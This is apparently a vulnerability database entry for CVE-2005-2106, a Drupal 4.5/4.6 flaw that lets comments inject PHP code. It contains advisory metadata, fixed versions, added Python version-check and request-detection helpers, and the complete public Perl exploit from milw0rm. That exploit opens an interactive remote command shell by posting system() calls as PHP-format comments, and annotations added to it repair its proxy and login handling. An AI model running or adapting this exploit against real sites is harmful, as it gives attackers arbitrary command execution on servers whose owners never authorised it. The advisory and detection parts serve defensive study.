CVE-2005-2106
CVSS 5.0
Published: 2005-07-05 00:00:00
Revised: 2016-10-17 23:24:59
NMCOES    

[Original] Unknown vulnerability in Drupal 4.5.0 through 4.5.3, 4.6.0, and 4.6.1 allows remote attackers to execute arbitrary PHP code via a public comment or posting.


[CNNVD] Drupal Unknown PHP Code Execution Vulnerability (CNNVD-200507-003)

        Drupal is an open-source CMS that serves as a content management platform for many kinds of websites.
        An unknown vulnerability exists in Drupal 4.5.0 through 4.5.3, 4.6.0 and 4.6.1.
        An attacker can exploit it to execute arbitrary PHP code through a public comment or posting.

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:drupal:drupal:4.5.3
cpe:/a:drupal:drupal:4.5.0
cpe:/a:drupal:drupal:4.5.2
cpe:/a:drupal:drupal:4.6.1
cpe:/a:drupal:drupal:4.5.1
cpe:/a:drupal:drupal:4.6.0

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2106
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2106
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200507-003
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=112015287827452&w=2
(UNKNOWN)  BUGTRAQ  20050629 [DRUPAL-SA-2005-002] Drupal 4.6.2 / 4.5.4 fixes input validation issue
http://www.debian.org/security/2005/dsa-745
(UNKNOWN)  DEBIAN  DSA-745
http://www.drupal.org/security/drupal-sa-2005-002/advisory.txt
(UNKNOWN)  CONFIRM  http://www.drupal.org/security/drupal-sa-2005-002/advisory.txt
http://www.securityfocus.com/bid/14110
(UNKNOWN)  BID  14110

- Vulnerability information

Drupal Unknown PHP Code Execution Vulnerability
Medium  Input validation
2005-07-05 00:00:00 2005-10-20 00:00:00
Remote
        Drupal is an open-source CMS that serves as a content management platform for many kinds of websites.
        An unknown vulnerability exists in Drupal 4.5.0 through 4.5.3, 4.6.0 and 4.6.1.
        An attacker can exploit it to execute arbitrary PHP code through a public comment or posting.

- Advisory and patch

        The vendor has released an upgrade that fixes this security issue; download link:
        http://drupal.org/project/drupal

- Vulnerability information (1088)

Drupal <= 4.5.3 & <= 4.6.1 Comments PHP Injection Exploit (EDBID:1088)
php webapps
2005-07-05 Verified
Author: dab
#!/usr/bin/perl
# Mon Jul  4 18:19:35 CEST 2005 dab@digitalsec.net
#
# DRUPAL-SA-2005-002 php injection in comments (yes, its lame)
# Hax0r code here, read before execute
#
# Run without arguments to show the help.
#
# BLINK! BLINK! BLINK! BLINK!
#
# Feel free to port to another stupid script language (mIRC,
# python, TCL or orthers), and send to securiteam (AGAIN)
# 
# Theo, this one hasn't been tested in BSD.. yet!
# infohacking: there're a lot of xss in drupal, contact me if you want 
# to program some exploits.
#
# BLINK! BLINK! BLINK! BLINK!
#
#
# HERE YOU CAN PUT YOUR BANNER!!!! THOUSENDS OF PEOPLE IS READING THIS LINE
# contact me for pricing and offerings.
#
# !dSR: yubiiiiii yeooooooooooo
#
use strict;
use warnings;
use LWP::UserAgent;
use LWP::Debug ();               # only for --debug; a deprecated no-op in libwww-perl 6.x
use HTTP::Cookies;
use HTTP::Request::Common "POST";
use MIME::Base64 qw(encode_base64);
use Getopt::Long;

$| = 1; # ;1 = |$

my ($proxy,$proxy_user,$proxy_pass);
my ($host,$debug,$drupal_user,$drupal_pass);
my $options = GetOptions (
    'host=s'        => \$host,
    'proxy=s'       => \$proxy,
    'proxy_user=s'  => \$proxy_user,
    'proxy_pass=s'  => \$proxy_pass,
    'drupal_user=s' => \$drupal_user,
    'drupal_pass=s' => \$drupal_pass,
    'debug'         => \$debug);
$proxy_pass  = '' unless defined $proxy_pass;
$drupal_pass = '' unless defined $drupal_pass;

help() unless ($host);

# Interactive loop: each line typed becomes the argument of system() inside
# a PHP-format comment. Ends on EOF (Ctrl-D) instead of spinning forever.
while (1){
    print "druppy461\$ ";
    my $cmd = <STDIN>;
    last unless defined $cmd;
    druppy($cmd);
}
exit (1); # could be replaced with exit(2)


sub druppy {
    chomp (my $cmd = shift);
    LWP::Debug::level('+') if $debug;

    my $ua = new LWP::UserAgent(
            cookie_jar=> { file => "$$.cookie" });   # this is a random feature
    $ua->agent("Morzilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!");

    # The proxy has to be configured before the first request (the login
    # included), and Proxy-Authorization belongs on the agent, not on an
    # undefined request object.
    if ($proxy) {
        $ua->proxy(['http'] => $proxy);
        $ua->default_header('Proxy-Authorization' =>
            'Basic ' . encode_base64("$proxy_user:$proxy_pass", '')) if $proxy_user;
    }

    if ($drupal_user) { # no need to exploit 
        my ($mhost, $h);
        if ($host =~ m{^(https?://.*?)\?q=}) {
            $mhost = $1;
            $h = $mhost . "?q=user/login";
        } #some magic hacking here
        elsif ($host =~ m{^(https?://[^/]+)}) {   # clean URLs: keep scheme and host only
            $mhost = $1;
            $h = $mhost . "/user/login";
        }
        else {
            die "cannot derive the login URL from $host\n";
        }
        print $h . "\n" if $debug; 
        my $req = POST $h,[
            'edit[name]' => "$drupal_user",
            'edit[pass]' => "$drupal_pass"
                ]; #grab these, and send to dsr!
        print $req->as_string() if $debug;
        my $res = $ua->request($req);
        print $res->content() if $debug;
        if ($res->is_redirect) {   # a successful login answers with a redirect
            print "Logged\n" if $debug;
        }
    }

    my $res = $ua->get("$host");
    my $html = $res->content();
    my @op; # buffer overflow here
    foreach (split(/\n/,$html)) { 
        if ( m/name="op" value="(.*?)"/){
            push(@op,$1);   # every submit button of the comment form (preview/post)
        }
    }# xss here
    warn "no comment form found at $host (login required, or wrong URL?)\n" unless @op;

    my $ok = 0; # globlal for admin purposes
    foreach my $op (@op) {
        # edit[format]=2 selects the "PHP code" input format, so the comment
        # body is evaluated server-side; the BLAH lines bracket the command
        # output in the returned page. $cmd is interpolated into a PHP
        # double-quoted string, so quotes and $ inside it need escaping.
        my $req = POST "$host",[
            'edit[subject]' => 'test',
            'edit[comment]' => 
             "<?php print(\"BLAH\\n\");system(\"$cmd\"); print(\"BLAH\\n\"); ?>",
            'edit[format]' => '2',
            'edit[cid]' => "", # drupal is sick.. it doesn't need arguments
            'edit[pid]' => "", # they use it to grab some statistycal information
            'edit[nid]' => "", # about users conduits. Don't buy in internet using drupal
            'op' => "$op"
                ];

        print $req->as_string() if $debug;
        my $res = $ua->request($req);
        my $html = $res->content(); 
        print $html if $debug;
        foreach (split(/\n/,$html)) {
            return if $ok > 1;          # second marker seen: output complete
            if (/BLAH/) { $ok++; next }
            print "$_\n" if $ok == 1;   # lines between the markers are the command output
        }
    }
}


sub help {
    print "Syntax: $0 --host=<url> [options]\n";
    print "\t--drupal_user, --drupal_pass  (needed if the site doesn't allow anonymous posts)\n";
    print "\t--proxy (http), --proxy_user, --proxy_pass\n";
    print "\t--debug\n";
    print "\nExample\n";
    print "bash# $0 --host=http://www.server.com/?q=comment/reply/1\n";
    print "\n";
    exit(1);
}


#sub 0day_solaris {
# please put your code here
#}

# milw0rm.com [2005-07-05]
		

- Vulnerability information

17647
Drupal Public Comment/Posting Arbitrary PHP Code Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2005-06-29 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Discovered by

Unknown or Incomplete

- Vulnerability information

Drupal Arbitrary PHP Code Execution Vulnerability
Class: Input Validation Error  Bugtraq ID: 14110
Remote: Yes  Local: No
Published: 2005-06-30 12:00:00  Updated: 2009-07-12 04:06:00
Kuba Zygmunt is credited with the discovery of this vulnerability.

- Affected program versions

Drupal Drupal 4.6.1
Drupal Drupal 4.6
Drupal Drupal 4.5.3
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
Drupal Drupal 4.5.2
Drupal Drupal 4.5.1
Drupal Drupal 4.5

- Unaffected program versions

Drupal Drupal 4.6.2
Drupal Drupal 4.5.4
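An added helper, not taken from this entry's sources: a Python check that maps a Drupal version string onto the affected and fixed ranges listed above (4.5.0 through 4.5.3, fixed in 4.5.4; 4.6.0 and 4.6.1, fixed in 4.6.2), so that an inventory of sites can be triaged against this CVE. Treating releases older than 4.5 as affected follows the discussion below ("earlier versions are reported vulnerable"); treating 4.7 and later as carrying the fix is an assumption of this example, not something the entry states.

```python
"""Added example (not Drupal's or this entry's own code): decide whether a
Drupal version string falls inside the range affected by CVE-2005-2106 and
which release fixes it, using the version lists of this entry."""
import re

# First release of each listed branch that carries the DRUPAL-SA-2005-002 fix.
FIXED_IN = {(4, 5): (4, 5, 4), (4, 6): (4, 6, 2)}
LATEST_FIXED = (4, 6, 2)


def parse_version(text):
    """Return (major, minor, patch). '4.6' and '4.6.0' name the same release,
    which is why the patch component defaults to 0; a pre-release suffix such
    as '-beta1' is tolerated but only the numeric part is compared."""
    m = re.fullmatch(
        r"\s*(\d+)\.(\d+)(?:\.(\d+))?(?:[-.]?(?:rc|beta|alpha)\d*)?\s*",
        text, re.IGNORECASE)
    if not m:
        raise ValueError(f"not a Drupal 4.x style version: {text!r}")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def fmt(v):
    return ".".join(str(n) for n in v)


def assess(text):
    """Return (affected, fixed_in): fixed_in is the release to move to when
    the version is affected, otherwise None."""
    v = parse_version(text)
    branch = v[:2]
    if branch in FIXED_IN:
        fixed = FIXED_IN[branch]
        return (v < fixed, fmt(fixed) if v < fixed else None)
    if v < (4, 5, 0):
        # Older branches are reported vulnerable and got no fix release of
        # their own: the only remedy is moving to the newest fixed branch.
        return (True, fmt(LATEST_FIXED))
    # Assumption: releases newer than 4.6.2 ship with the fix.
    return (False, None)


if __name__ == "__main__":
    for s in ["4.5.0", "4.5.3", "4.5.4", "4.6", "4.6.1", "4.6.2", "4.4.2", "4.7.0"]:
        affected, fixed = assess(s)
        print(f"{s:>6}: affected={affected} fixed_in={fixed}")
```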

- Vulnerability discussion

Drupal is prone to a vulnerability that permits the execution of arbitrary PHP code. This issue is due to a failure in the application to properly sanitize user-supplied input.

The application's filter mechanism fails to properly sanitize user-supplied input to 'comments' and 'postings'.

The vendor has addressed this issue in Drupal versions 4.6.2 and 4.5.4; earlier versions are reported vulnerable.
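An added example, not part of this entry and not Drupal's or the exploit author's code: detection logic in Python that flags captured HTTP requests matching the attack described here. The indicators are taken from the exploit script on this page: a POST to a comment reply URL, edit[format]=2 (the PHP code input format the script selects), a PHP open tag in edit[comment], and the script's self-identifying User-Agent. The three sample requests are constructed for the example; the path patterns (clean URLs and the ?q= form) and the format id 2 are assumptions about a 4.5/4.6 site that match the script's defaults.

```python
"""Added example (not part of this entry, not Drupal's or the exploit's
code): flag raw HTTP requests that look like the comment PHP-injection
attack of CVE-2005-2106 / DRUPAL-SA-2005-002. Sample requests below are
constructed, not captured traffic."""
import re
from urllib.parse import parse_qs

# Comment form targets, in clean-URL ("/comment/reply/1") and "?q=" styles.
COMMENT_FORM = re.compile(r"(?:/|[?&]q=)comment/(?:reply|edit)(?:/|$)")
PHP_OPEN_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)
PHP_FORMAT_ID = "2"  # assumption: input format 2 is "PHP code", as in the exploit above


def parse_request(raw):
    """Split a raw HTTP/1.x request into method, target, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def indicators(raw):
    """Return the attack indicators found in one raw request; an empty list
    means the request does not match this attack."""
    req = parse_request(raw)
    if req["method"] != "POST" or not COMMENT_FORM.search(req["target"]):
        return []
    # parse_qs also decodes the bracketed field names (edit%5Bformat%5D).
    fields = parse_qs(req["body"], keep_blank_values=True)
    fmt = fields.get("edit[format]", [""])[0]
    comment = fields.get("edit[comment]", [""])[0]
    found = []
    if fmt == PHP_FORMAT_ID:
        found.append("php-input-format-requested")
    if PHP_OPEN_TAG.search(comment):
        found.append("php-open-tag-in-comment")
    if "exploit" in req["headers"].get("user-agent", "").lower():
        found.append("exploit-user-agent")
    return found


def is_attack(raw):
    """A PHP open tag in the comment, or a request for the PHP input format,
    is enough on its own; the User-Agent is only a weak corroborating hint."""
    return any(h.startswith("php-") for h in indicators(raw))


# Constructed samples: an ordinary comment, then two requests shaped like
# what the Perl script above sends (clean-URL and ?q= forms).
BENIGN = (
    "POST /comment/reply/1 HTTP/1.1\r\nHost: www.example.test\r\n"
    "User-Agent: Mozilla/5.0\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n"
    "edit%5Bsubject%5D=hello&edit%5Bcomment%5D=nice+post&edit%5Bformat%5D=1&op=Post+comment"
)
ATTACK_CLEAN_URL = (
    "POST /comment/reply/1 HTTP/1.1\r\nHost: www.example.test\r\n"
    "User-Agent: Morzilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!)\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "edit%5Bsubject%5D=test&edit%5Bcomment%5D=%3C%3Fphp+system%28%22id%22%29%3B+%3F%3E"
    "&edit%5Bformat%5D=2&edit%5Bcid%5D=&edit%5Bpid%5D=&edit%5Bnid%5D=&op=Preview+comment"
)
ATTACK_QUERY_URL = (
    "POST /?q=comment/reply/1 HTTP/1.1\r\nHost: www.example.test\r\n"
    "User-Agent: Mozilla/5.0\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n"
    "edit%5Bsubject%5D=x&edit%5Bcomment%5D=%3C%3Fphp+echo+1%3B+%3F%3E&edit%5Bformat%5D=2&op=Post+comment"
)

if __name__ == "__main__":
    for name, raw in [("benign", BENIGN), ("attack, clean URL", ATTACK_CLEAN_URL),
                      ("attack, ?q= URL", ATTACK_QUERY_URL)]:
        print(f"{name}: attack={is_attack(raw)} indicators={indicators(raw)}")
```

The format check matters even when the comment body looks harmless: a request that asks for the PHP format from an account that should not have it is the precondition for the attack, and logging it separately from the open-tag match shows which accounts or addresses are probing for the bypass.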

- Exploit

No exploit is required.

A proof of concept has been provided by dab <dab@digitalsec.net>.

- Solution

The vendor has addressed this issue in Drupal 4.6.2 and 4.5.4.

Debian Linux has released security advisory DSA 745-1 addressing this issue for drupal. Please see the referenced advisory for details on obtaining and applying the appropriate updates.

- Related references

 

 
